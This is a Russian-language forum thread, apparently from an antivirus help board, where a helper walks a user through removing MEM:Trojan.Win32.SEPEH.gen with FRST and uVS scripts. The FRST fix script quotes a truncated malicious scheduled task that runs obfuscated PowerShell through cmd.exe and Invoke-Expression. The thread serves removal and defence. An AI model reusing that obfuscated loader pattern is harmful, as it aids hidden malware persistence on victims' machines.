Перейти к содержанию

MEM:Trojan.Win32.SEPEH.gen


Рекомендуемые сообщения

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Start::
    CloseProcesses:
    SystemRestore: On
    CreateRestorePoint:
    Task: {36D0A3F9-EFDA-4430-9646-7D7EC6308F49} - System32\Tasks\$nya-CcVuc329 => C:\Windows\system32\cmd.exe [339968 2025-03-12] (Microsoft Windows -> Microsoft Corporation) -> /C echo function mXiJ($ocUH){	Invoke-Expression -Debug -InformationAction Ignore '$Bwqa=ie[ieSyiestieemie.Sieeiecieuierieiietyie.ieCierieyiepietoiegierieaiepiehiey.ieAieeiesie]:ie:ieCierieeieatieeie(ie);'.Replace('ie', '');	Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction (запись имеет ещё 3541 символов). <==== ВНИМАНИЕ
    FirewallRules: [{DD1CE507-77A0-4C90-BBB4-4F4468856A14}] => (Allow) C:\Users\piggy\MediaGet2\mediaget.exe => Нет файла
    FirewallRules: [{6A5DAEB1-DEE7-47AE-A319-76EC3E56588C}] => (Allow) C:\Users\piggy\MediaGet2\mediaget.exe => Нет файла
    FirewallRules: [{6B9FD7B8-B9FA-4513-B3C9-27DB457F5857}] => (Allow) C:\Users\piggy\MediaGet2\QtWebEngineProcess.exe => Нет файла
    FirewallRules: [{EF9D1807-7C8F-4DF3-8BA7-D59544D53B89}] => (Allow) C:\Users\piggy\MediaGet2\QtWebEngineProcess.exe => Нет файла
    Reboot:
    End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

После этого проверьте ещё раз антивирусом Касперского.

  • Like (+1) 1
Ссылка на комментарий
Поделиться на другие сайты

Очистите отчеты антивируса с найденными угрозами, запустите полную проверку антивирусом и сообщите результат.

  • Like (+1) 1
Ссылка на комментарий
Поделиться на другие сайты

Хорошо. По окончании сделаем некоторую очистку.

  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    ;uVS v4.99.10v x64 [http://dsrt.dyndns.org:8888]
    ;Target OS: NTv11.0
    v400c
    
    ;---------command-block---------
    delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\BNXHAIMOJRLGGDXNTJGRBUBJGMBWV
    delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\FBZQZKYQWHMMOYWSDKXSONUCTVO
    delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\JCZIHPSLDYBAISDGURDJNFEWNUFVD
    delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\TUUFEMTZNEUSPYUFOOBOX
    delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\VCPLITLKUBMKH
    delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\XSYBZVJJKRJNKEV
    apply
    
    regt 40
    
    restart

     

  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена…"
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер будет перезагружен.
  6. В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его к своему сообщению.

Подробнее читайте в этом руководстве.

Ссылка на комментарий
Поделиться на другие сайты

14 минут назад, Sandor сказал:

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его к своему сообщению

Файл забыли.

Ссылка на комментарий
Поделиться на другие сайты

Чтобы просмотреть отчеты, выполните следующие действия:
  1. В главном окне приложения в разделе Мониторинг нажмите на плитку Отчеты. Отчеты
  2. В списке компонентов и задач выберите компонент или задачу. ...
  3. Если требуется просмотреть подробную информацию о событии, выберите в отчете нужное событие.

Так получится посмотреть (а лучше экспортировать) отчёт об этой невидимой угрозе?

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • badmemory
      Автор badmemory
      Обнаружил у себя 2 файла этого вируса, устранить не получается
       
    • KitNE
      Автор KitNE
      Всем привет,  Касперский нашёл  MEM:Trojan.Win32.SEPEH.gen. Базовое лечение анвирусом не помогает. Попробовал способы с ранних тем форума, результата нет, антивирус снова его находит.
      report1.log report2.log
    • Red_1663
      Автор Red_1663
      Добрый день!
      Антивирус постоянно обнаруживает MEM:Trojan.Multi.Agent.gen и MEM:Trojan.Win32.SEPEH.gen. Удаляютс при перезагрузке, но при новом поиске снова находит
       
      Из логов
      pmem:\C:\Windows\explorer.exe                                   Вылечено        Объект вылечен  MEM:Trojan.Win32.SEPEH.gen         
      pmem:\C:\Users\i_sus\AppData\Roaming\Sandboxie\sandboxie.exe    Вылечено        Объект вылечен  MEM:Trojan.Win32.SEPEH.gen
      pmem:\C:\Windows\System32\conhost.exe                           Вылечено        Объект вылечен  MEM:Trojan.Multi.Agent.gen
    • ysomad
      Автор ysomad
      Здравствуйте, каким-то образом словил Win32.SEPEH.gen. Касперский файлы лечит, но он появляется снова и прыгает по разным файлам.
       
       
      Принудительное сканирование этих файлов ничего не дает. KRD тоже ничего не нашел.
      Прикрепляю логи CollectionLog-2025.01.26-21.54.zip
       
      Заранее спасибо за помощь.
    • INITIATED
      Автор INITIATED
      123.txtKIS обнаруживает два файла, определяет их как троянская программа, вылечивает один MEM:Trojan.Multi.Agent.gen, второй MEM:Trojan.Win32.SEPEH.gen пытается вылечить с перезагрузкой, но после перезагрузки вновь находит эти файлы. KVRT и Dr.Web_Curelt также не помогли.
      CollectionLog-2025.03.24-20.56.zip
      Отчет AutoLogger
      Отчет uvs_latest
      V2-PC_2025-03-24_20-47-16_v4.99.10v x64.7z
×
×
  • Создать...